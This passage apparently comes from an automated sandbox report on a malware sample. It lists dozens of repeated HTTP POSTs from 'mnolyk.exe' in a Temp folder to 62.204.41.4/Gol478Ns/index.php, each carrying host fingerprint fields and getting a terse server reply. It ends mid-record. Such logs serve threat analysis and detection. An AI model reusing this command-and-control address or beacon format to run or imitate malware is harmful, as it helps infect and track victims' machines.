                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:23.093133926 CET  604                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            416         192.168.2.4  50111        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:23.277591944 CET  604                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:23.341398954 CET  605                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            417         192.168.2.4  50112        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:23.514611959 CET  605                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:23.580266953 CET  606                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            418         192.168.2.4  50113        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:23.761965036 CET  606                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:23.825628996 CET  607                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            419         192.168.2.4  50114        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:23.997915983 CET  607                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:24.063193083 CET  608                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            42          192.168.2.4  49737        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:37:37.044349909 CET  231                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:37.111370087 CET  231                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            420         192.168.2.4  50115        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:24.252624989 CET  608                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:24.317740917 CET  609                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            421         192.168.2.4  50116        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:24.518582106 CET  609                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:24.583477974 CET  610                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            422         192.168.2.4  50117        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:24.763180971 CET  610                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:24.827112913 CET  611                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:24 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            423         192.168.2.4  50118        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:24.995857000 CET  611                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:25.290040970 CET  612                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:25.354259014 CET  612                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            424         192.168.2.4  50119        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:25.527748108 CET  613                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:25.591574907 CET  613                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            425         192.168.2.4  50120        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:25.768548965 CET  614                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:25.833265066 CET  614                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            426         192.168.2.4  50121        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:26.010780096 CET  615                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:26.078212023 CET  615                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            427         192.168.2.4  50122        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:26.248692989 CET  616                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:26.314353943 CET  616                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            428         192.168.2.4  50123        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:26.512748957 CET  617                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:26.575915098 CET  617                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            429         192.168.2.4  50124        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:39:26.754786968 CET  618                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:26.819739103 CET | 618 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            43 | 192.168.2.4 | 49738 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:37.329606056 CET | 232 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:37.393659115 CET | 232 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            430 | 192.168.2.4 | 50125 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:26.996304035 CET | 619 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:27.063054085 CET | 619 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            431 | 192.168.2.4 | 50126 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:27.231065989 CET | 620 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:27.294929028 CET | 620 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            432 | 192.168.2.4 | 50127 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:27.463618994 CET | 621 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:27.531197071 CET | 621 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            433 | 192.168.2.4 | 50128 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:27.718210936 CET | 622 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
